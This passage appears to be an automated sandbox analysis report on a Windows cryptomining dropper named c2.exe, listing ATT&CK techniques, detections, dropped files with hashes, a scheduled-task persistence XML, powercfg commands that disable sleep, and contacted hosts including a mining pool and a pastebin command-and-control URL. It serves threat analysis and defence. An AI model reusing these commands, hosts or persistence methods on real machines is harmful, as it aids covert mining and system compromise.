                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		1
                Windows Service                		1
                Windows Service                		11
                Masquerading                		OS Credential Dumping311
                Security Software Discovery                		Remote ServicesData from Local System1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job11
                DLL Side-Loading                		511
                Process Injection                		12
                Virtualization/Sandbox Evasion                		LSASS Memory12
                Virtualization/Sandbox Evasion                		Remote Desktop ProtocolData from Removable Media1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		511
                Process Injection                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		NTDS3
                System Information Discovery                		Distributed Component Object ModelInput Capture1
                Ingress Tool Transfer                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Abuse Elevation Control Mechanism                		LSA SecretsInternet Connection DiscoverySSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture3
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576710 Sample: c2.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 49 xmr-asia1.nanopool.org 2->49 51 pastebin.com 2->51 61 Suricata IDS alerts for network traffic 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for dropped file 2->65 71 8 other signatures 2->71 7 updater.exe 4 2->7         started        11 cmd.exe 1 2->11         started        13 c2.exe 2 2->13         started        15 3 other processes 2->15 signatures3 67 DNS related to crypt mining pools 49->67 69 Connects to a pastebin service (likely for C&C) 51->69 process4 file5 37 C:\Windows\Temp\ppefirylicdf.sys, PE32+ 7->37 dropped 39 C:\Windows\Temp\lnobvhjdatqu.tmp, PE32+ 7->39 dropped 73 Injects code into the Windows Explorer (explorer.exe) 7->73 75 Writes to foreign memory regions 7->75 77 Modifies the context of a thread in another process (thread injection) 7->77 85 2 other signatures 7->85 17 explorer.exe 7->17         started        21 conhost.exe 7->21         started        79 Uses powercfg.exe to modify the power settings 11->79 81 Modifies power options to not sleep / hibernate 11->81 23 conhost.exe 11->23         started        25 powercfg.exe 1 11->25         started        27 powercfg.exe 1 11->27         started        33 2 other processes 11->33 41 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 13->41 dropped 83 Found direct / indirect Syscall (likely to bypass EDR) 13->83 29 conhost.exe 15->29         started        31 conhost.exe 15->31         started        35 8 other processes 15->35 signatures6 process7 dnsIp8 43 103.3.62.64, 10343, 49730 LINODE-APLinodeLLCUS Singapore 17->43 45 xmr-asia1.nanopool.org 51.79.145.144, 10343, 49732 OVHFR Canada 17->45 47 pastebin.com 104.20.4.235, 443, 49731 CLOUDFLARENETUS United States 17->47 53 System process connects to network (likely due to code injection or exploit) 17->53 55 Query firmware table information (likely to detect VMs) 17->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->57 59 Found strings related to Crypto-Mining 21->59 signatures9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                c2.exe42%ReversingLabsWin64.Trojan.Rozena
                c2.exe100%AviraTR/Crypt.EPACK.Gen2
                c2.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files\Google\Chrome\updater.exe100%AviraTR/Crypt.EPACK.Gen2
                C:\Windows\Temp\lnobvhjdatqu.tmp100%Joe Sandbox ML
                C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                C:\Program Files\Google\Chrome\updater.exe42%ReversingLabsWin64.Trojan.Rozena
                C:\Windows\Temp\lnobvhjdatqu.tmp62%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                C:\Windows\Temp\ppefirylicdf.sys5%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                xmr-asia1.nanopool.org
                		51.79.145.144
                		truefalse
                  		high
                  pastebin.com
                  		104.20.4.235
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://pastebin.com/raw/YLG9StR0false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.cloudflare.com/origin_caexplorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://pastebin.com/raw/YLG9StR0--cinit-stealth-targets=Taskmgr.exeexplorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://pastebin.com/raw/YLG9StR0$explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://ocsp.cloudflare.com/origin_ca0explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://pastebin.com/raw/YLG9StR08explorer.exe, 00000017.00000003.1700744936.0000000000D20000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://pastebin.com/raw/YLG9StR0Taskmgr.exeexplorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://pastebin.com/raw/YLG9StR090explorer.exe, 00000017.00000002.4158658044.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://xmrig.com/docs/algorithmsconhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.20.4.235
                                          		pastebin.comUnited States
                                          		13335CLOUDFLARENETUSfalse
                                          51.79.145.144
                                          		xmr-asia1.nanopool.orgCanada
                                          		16276OVHFRfalse
                                          103.3.62.64
                                          		unknownSingapore
                                          		63949LINODE-APLinodeLLCUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1576710
                                          Start date and time:2024-12-17 12:45:09 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:37
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:c2.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.mine.winEXE@45/5@2/3
                                          EGA Information:
                                          • Successful, ratio: 25%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target c2.exe, PID 7428 because it is empty
                                          • Execution Graph export aborted for target updater.exe, PID 7684 because it is empty
                                          • Execution Graph export aborted for target updater.exe, PID 7928 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: c2.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          06:46:01API Interceptor1x Sleep call for process: c2.exe modified
                                          06:46:02API Interceptor2x Sleep call for process: updater.exe modified
                                          11:46:03Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          gaber.ps1Get hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                          • pastebin.com/raw/sA04Mwk2
                                          sostener.vbsGet hashmaliciousNjratBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          sostener.vbsGet hashmaliciousXWormBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          envifa.vbsGet hashmaliciousRemcosBrowse
                                          • pastebin.com/raw/V9y5Q5vv
                                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                          • pastebin.com/raw/NsQ5qTHr
                                          51.79.145.144kYSSVJizBr.exeGet hashmaliciousXmrigBrowse
                                            103.3.62.64file.exeGet hashmaliciousXmrigBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              pastebin.comInstruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                              • 172.67.19.24
                                              RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                              • 104.20.4.235
                                              file.exeGet hashmaliciousXWormBrowse
                                              • 172.67.19.24
                                              main.exeGet hashmaliciousUnknownBrowse
                                              • 104.20.4.235
                                              CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                              • 104.20.4.235
                                              http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                              • 172.67.19.24
                                              http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                              • 172.67.19.24
                                              KrnlSetup.exeGet hashmaliciousXWormBrowse
                                              • 104.20.3.235
                                              Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                              • 104.20.3.235
                                              Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                              • 104.20.4.235
                                              xmr-asia1.nanopool.orgfile.exeGet hashmaliciousXmrigBrowse
                                              • 103.3.62.64
                                              Setup.exeGet hashmaliciousXmrigBrowse
                                              • 172.104.165.191
                                              kYSSVJizBr.exeGet hashmaliciousXmrigBrowse
                                              • 172.104.165.191
                                              file.exeGet hashmaliciousRedLine, XmrigBrowse
                                              • 51.79.145.144
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 139.99.102.74
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 139.99.101.198
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 103.3.62.64
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 139.99.102.71
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 139.99.102.70
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 139.99.102.73

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              LINODE-APLinodeLLCUS236236236.elfGet hashmaliciousUnknownBrowse
                                              • 45.79.222.138
                                              A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                              • 139.162.173.118
                                              https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                              • 172.104.63.70
                                              RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                              • 45.33.6.223
                                              Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                              • 178.79.184.196
                                              rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 212.71.233.17
                                              la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 178.79.182.90
                                              la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                              • 50.116.24.57
                                              BlOgLNwCom.exeGet hashmaliciousXenoRATBrowse
                                              • 96.126.118.61
                                              i586.elfGet hashmaliciousUnknownBrowse
                                              • 172.104.31.172
                                              CLOUDFLARENETUS23d5f89e-2c54-ee19-3778-06a4bec842b9.emlGet hashmaliciousUnknownBrowse
                                              • 104.18.65.57
                                              https://protect.checkpoint.com/v2/r01/___https://link.edgepilot.com/xdg*~*fiaa57dVgx2DluRTp19jF8WMmYfWl?z=myyux:ddjrfnq.ynintwjuqD.htrdhdjOBhER6ylHFZFTGu9JoBlVNMIw79G-bMOgKn5Sf55EkuFm_s/LOKQ2pPEoswuEsuU2A7WKVctU0F0LxRir4fJPhZrPOzTgvHZltxJFSX/jFwCJW7F4BtO0gjUt6gM8NiU9g*~*uEaD_oE2wiDMlq2GDu8zhwYySQbzr0kVZGcn8s4Dk7cEDvSl6XRkaXaP7a5RqmSqgUx7-yk6g8/s-FxFFU__PNlcuV___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmRkMGI4MjA2MTNmMjg1YzMyNTM2YjE2YzI0MjAzMGU1Ojc6MzQ1NjphZDU1ODAwMDRlN2FjYWY0Nzk3ODJmN2U3MjI1MmNkMTUyZWIyNWZlZjgyYTY4N2M3ZWVjN2E0NjVmZjU3M2E4Omg6VDpUGet hashmaliciousUnknownBrowse
                                              • 104.16.123.96
                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                              • 172.67.129.27
                                              122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                              • 162.159.61.3
                                              pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                              • 172.64.41.3
                                              IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                              • 172.64.41.3
                                              873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                              • 172.64.41.3
                                              0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                              • 162.159.61.3
                                              https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.comGet hashmaliciousUnknownBrowse
                                              • 104.17.25.14
                                              https://www.google.com/amp/s/wellsecure.es/.secure##email##Get hashmaliciousUnknownBrowse
                                              • 172.67.166.39
                                              OVHFRClienter.dll.dllGet hashmaliciousUnknownBrowse
                                              • 51.77.90.246
                                              uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                              • 54.36.205.38
                                              https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                              • 54.38.113.6
                                              Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                              • 94.23.76.52
                                              https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                              • 46.105.222.162
                                              1.elfGet hashmaliciousUnknownBrowse
                                              • 51.77.132.207
                                              236236236.elfGet hashmaliciousUnknownBrowse
                                              • 198.50.252.64
                                              sh4.elfGet hashmaliciousMiraiBrowse
                                              • 51.38.60.221
                                              ppc.elfGet hashmaliciousMiraiBrowse
                                              • 176.31.173.203
                                              i686.elfGet hashmaliciousMiraiBrowse
                                              • 51.91.63.124

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Windows\Temp\ppefirylicdf.sysldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                    feZvV3DCj8.exeGet hashmaliciousXmrigBrowse
                                                      services64.exeGet hashmaliciousXmrigBrowse
                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                  C:\Windows\Temp\lnobvhjdatqu.tmpfile.exeGet hashmaliciousXmrigBrowse

                                                                    Created / dropped Files

                                                                    C:\Program Files\Google\Chrome\updater.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\c2.exe
                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5737472
                                                                    Entropy (8bit):7.67011402410826
                                                                    Encrypted:false
                                                                    SSDEEP:98304:Tr+uGthg9APk/gpZ49dTpFj8MxJckGsab4PkNU/ZsGpSGvJXkt:TihtO9A8sybTFjGGPjsMSGvJUt
                                                                    MD5:EB0588E6420A0A2FB8B262554091ADD3
                                                                    SHA1:5C2BDD9050A44B7AFD028E9BE44142DA93232A37
                                                                    SHA-256:6CB04057A0313BC34459ABA72170F4039148AAACE0B396B6C881B92769199853
                                                                    SHA-512:8278FA6A29258F4095200540D003F33EDE8AC7D8267FCAA14872FDAD674205057FE728754F53AC43FE2F4DCD36FBE223F6D52C9D71AE4F7CA98C2921AEC710AF
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.F....W................@............................. X.......X...`... ...............................................W.......X.......W.p.............X..............................}W.(.....................W.P............................text...xE.......F..................`..`.data...@.W..`....W..J..............@....rdata.......pW......XW.............@..@.pdata..p.....W......pW.............@..@.xdata........W......vW.............@..@.bss..........W..........................idata........W......|W.............@....CRT....`.....W.......W.............@....tls..........W.......W.............@....rsrc.........X.......W.............@....reloc........X.......W.............@..B........................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wjwbvsfqhrdh.xml

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\c2.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1490
                                                                    Entropy (8bit):5.1015990235428035
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                    MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                    SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                    SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                    SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

                                                                    C:\Windows\Temp\lnobvhjdatqu.tmp

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5651456
                                                                    Entropy (8bit):6.686504811317419
                                                                    Encrypted:false
                                                                    SSDEEP:98304:arBrt3+RH2GEo/L7pdenlL17ouknW3jZAk3cB0vyRfgIlFQSmf1JjGGI0:aj3+RZyjZn3c5RYIlGLfjGGI
                                                                    MD5:71BA2926F4F302EA7524510B7A07CD28
                                                                    SHA1:A9AE469CE440353F66FF604EDE55528F95D3F6BA
                                                                    SHA-256:3D0E5AED0AFC5A7719AF93C49C55E6CE91ADFFE5CC50D1597ABB1CCED05FFAA3
                                                                    SHA-512:3F6580D75D177222719A79E9AA79F6361D545AE5E3135D77D7C0C96C97C87A02E92F3EFEC8C21F0D4AB643DE8F8E261C0026C5015A00B0785A9FAC55CF187089
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: Joe Security
                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: unknown
                                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: Florian Roth
                                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                    Joe Sandbox View:
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......H.- ..Cs..Cs..CsG.@r..CsG.Fr..CsG.Gr..Cs...s..Cs..Gr..Cs..Frf.Cs..@r..Cs:.Gr..Cs..Bs..CsG.Br..Cs..Gr_.Cs:.Jr..Cs:.@r..Cs:..s..Cs...s..Cs:.Ar..CsRich..Cs................PE..d....r.d.........."....%.l;...D......7........@..........................................`..................................................CR...............}.D............ ..x.....N.......................N.(...@.N.@.............;.8............................text....k;......l;................. ..`.rdata........;......p;.............@..@.data.....+..pR......ZR.............@....pdata..D.....}......dS.............@..@_RANDOMX.............nU.............@..`_TEXT_CN.&.......(...|U.............@..`_TEXT_CN..............U.............@..`_RDATA..\.............U.............@..@.rsrc.................U.............@..@.reloc..x.... ........U.............@..B........................................

                                                                    C:\Windows\Temp\ppefirylicdf.sys

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):14544
                                                                    Entropy (8bit):6.2660301556221185
                                                                    Encrypted:false
                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                    Joe Sandbox View:
                                                                    • Filename: ldr.ps1, Detection: malicious, Browse
                                                                    • Filename: ZppxPm0ASs.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: feZvV3DCj8.exe, Detection: malicious, Browse
                                                                    • Filename: services64.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                    • Filename: 5EZLEXDveC.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\wjwbvsfqhrdh.xml

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1490
                                                                    Entropy (8bit):5.1015990235428035
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                    MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                    SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                    SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                    SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                    Malicious:false
